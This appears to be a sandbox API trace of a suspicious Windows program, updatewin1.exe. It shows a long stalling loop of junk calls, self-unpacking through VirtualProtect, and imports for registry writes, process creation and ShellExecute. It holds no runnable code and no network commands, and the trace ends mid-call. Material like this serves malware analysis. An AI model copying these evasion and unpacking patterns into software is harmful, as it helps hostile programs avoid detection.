nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.236] AddAtomA (lpString=0x0) returned 0x0 [0118.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.237] AddAtomA (lpString=0x0) returned 0x0 [0118.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.238] AddAtomA (lpString=0x0) returned 0x0 [0118.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.238] AddAtomA (lpString=0x0) returned 0x0 [0118.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.239] AddAtomA (lpString=0x0) returned 0x0 [0118.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.240] AddAtomA (lpString=0x0) returned 0x0 [0118.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.241] AddAtomA (lpString=0x0) returned 0x0 [0118.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.242] AddAtomA (lpString=0x0) returned 0x0 [0118.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.242] AddAtomA (lpString=0x0) returned 0x0 [0118.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.242] AddAtomA (lpString=0x0) returned 0x0 [0118.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.247] AddAtomA (lpString=0x0) returned 0x0 [0118.247] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.247] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.320] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0118.320] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0118.320] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0118.321] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0118.321] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0118.321] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0118.321] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0118.321] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0118.321] SetErrorMode (uMode=0x400) returned 0x0 [0118.321] SetErrorMode (uMode=0x0) returned 0x400 [0118.321] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0118.321] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0118.324] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0118.362] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.401] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0118.401] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0118.401] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0118.402] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0118.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0118.404] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0118.405] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0118.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0118.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0118.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0118.406] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0118.408] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0118.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0118.410] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0118.411] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0118.411] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0118.411] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0118.411] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0118.411] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0118.411] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0118.411] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0118.412] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0118.412] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0118.412] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0118.412] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0118.412] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0118.412] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0118.412] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0118.412] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0118.412] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0118.413] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0118.413] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75420000 [0118.417] GetProcAddress (hModule=0x75420000, lpProcName="atexit") returned 0x7543c544 [0118.417] atexit (param_1=0x2563d8) returned 0 [0118.419] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0xde862240, dwHighDateTime=0x1d6d58a)) [0118.419] GetCurrentThreadId () returned 0xaf4 [0118.419] GetCurrentProcessId () returned 0xb10 [0118.419] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=23861162098) returned 1 [0118.439] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0118.502] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.502] GetLastError () returned 0x57 [0118.506] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.506] GetLastError () returned 0x57 [0118.506] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0118.506] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0118.547] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.547] GetLastError () returned 0x57 [0118.547] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.547] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0118.587] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.587] GetLastError () returned 0x57 [0118.588] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.588] GetLastError () returned 0x57 [0118.588] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0118.588] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0118.588] GetProcessHeap () returned 0x240000 [0118.588] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.588] GetLastError () returned 0x57 [0118.588] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.588] GetLastError () returned 0x57 [0118.589] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0118.589] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x364) returned 0x26a9e8 [0118.589] SetLastError (dwErrCode=0x57) [0118.590] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xc00) returned 0x26ad58 [0118.591] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x51352375, hStdError=0xfffffffe)) [0118.591] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0118.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0118.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.591] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" " [0118.591] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" " [0118.592] IsValidCodePage (CodePage=0x4e4) returned 1 [0118.592] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0118.592] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0118.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 